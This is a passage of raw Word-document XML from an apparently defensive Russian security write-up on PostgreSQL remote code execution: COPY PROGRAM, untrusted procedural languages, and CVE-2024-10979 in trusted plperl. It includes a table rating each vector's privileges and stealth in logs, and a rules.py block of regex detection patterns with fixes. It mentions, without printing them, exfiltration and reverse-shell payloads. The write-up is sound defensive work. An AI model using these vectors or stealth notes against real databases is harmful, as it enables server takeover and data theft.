          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE здесь — финальная стадия после получения SQL-execution с подходящей привилегией</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сам механизм исполнения OS-команд — либо документированная фича PostgreSQL (COPY PROGRAM), либо штатная функциональность untrusted-расширений; CVE-2024-10979 — единственное исключение, реальный sandbox-escape.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FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — самый прямой путь. Три payload: one-shot exfil через TO PROGRAM, reverse-shell через FROM PROGRAM, chain с CVE-2025-1094. Требует superuser или predefined role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(с PG 11).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3.7.2a plperlu untrusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Perl без sandbox через CREATE FUNCTION. Только superuser. system()/exec()/backtick из тела функции.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3.7.2b CVE-2024-10979 в plperl trusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единственный путь без superuser. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{LD_PRELOAD}</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$ENV{PATH}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через дыру в Safe-sandbox trusted plperl. Pre-condition — вредоносный файл на хосте. Уязвимо до 17.1/16.5/15.9/14.14/13.17/12.21 (фикс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3.7.3 plpython3u и plsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Python и shell без sandbox. Те же требования (superuser), та же модель угроз. Plus упоминание plr (untrusted) и plv8 (trusted).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение векторов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Расширение / pre-flight</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Managed-доступность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Стелс</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COPY PROGRAM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11+: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ИЛИ superuser; PG ≤10: superuser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встроено (COPY)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нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на RDS/Cloud SQL/Supabase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низкий — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">COPY ... PROGRAM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в логах</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3.7.2a</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plperlu</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superuser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EXTENSION plperlu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Perl-runtime на хосте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средний — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE FUNCTION ... LANGUAGE plperlu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в DDL-логах</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 в plperl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(USAGE on plperl) + CREATE в любой схеме (pg_temp всегда) + уязвимая версия PG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EXTENSION plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (trusted) + Perl-runtime; файл в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; trigger через spawn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частично (Cloud SQL — да, RDS опционально); все managed обычно патчат вовремя</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высокий — невидимо в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_proc.prosrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> после исполнения, ENV-mutation вне DDL-логов</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plpython3u / plsh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superuser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EXTENSION plpython3u</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plsh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Python/bash на хосте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средний — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE FUNCTION ... LANGUAGE plpython3u/plsh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в DDL-логах</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный набор паттернов по всем четырём подразделам:</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RCE = "rce"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VulnerabilityClass.RCE: 10,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"rce_copy_program": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCOPY\b[^;]*\b(FROM|TO)\s+PROGRAM\b",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"rce_untrusted_lang": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b[^;]*\b"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"LANGUAGE\s+(plperlu|plpython3u|plpythonu|plsh|plr)\b",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"rce_cve_2024_10979": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bLANGUAGE\s+plperl\b(?!u)[^;]*\$ENV\s*\{",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE | re.DOTALL,</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if _RE["rce_copy_program"].search(sql):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vulnerability_class=VulnerabilityClass.RCE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="COPY FROM/TO PROGRAM исполняет shell-команду "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "на сервере PostgreSQL как пользователь postgres "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(требует pg_execute_server_program или superuser).",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите COPY ... PROGRAM из application-кода; "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "для backup/ETL — отдельная роль и отдельная сессия, "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "не из веб-приложения.",</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_RE["rce_untrusted_lang"].search(sql):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vulnerability_class=VulnerabilityClass.RCE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="CREATE FUNCTION в untrusted procedural language "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(plperlu/plpython3u/plsh/plr) даёт полный доступ "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "к OS-API; требует superuser и приводит к RCE.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Не создавайте функции в untrusted-языках из "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "application-кода; пересмотрите, нужны ли "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "untrusted-расширения вообще (REVOKE / DROP EXTENSION).",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_RE["rce_cve_2024_10979"].search(sql):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vulnerability_class=VulnerabilityClass.RCE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Модификация $ENV{} в trusted plperl-функции — "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "паттерн эксплуатации CVE-2024-10979. На версиях PG "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "до 17.1/16.5/15.9/14.14/13.17/12.21 ведёт к RCE "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "без superuser.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Обновите PostgreSQL до фиксированной minor-версии "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "(17.1+/16.5+/...); ограничьте USAGE на plperl "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "до доверенных ролей.",</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Risk 10 для всех трёх паттернов — максимальный, потому что любая из этих находок означает либо реальный RCE-вектор, либо паттерн, неотличимый от попытки эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cron-extensions — boilerplate для отсроченного запуска</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_cron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pgagent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяют расписать SQL по cron-выражению. Сами по себе не дают command execution, но используются как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
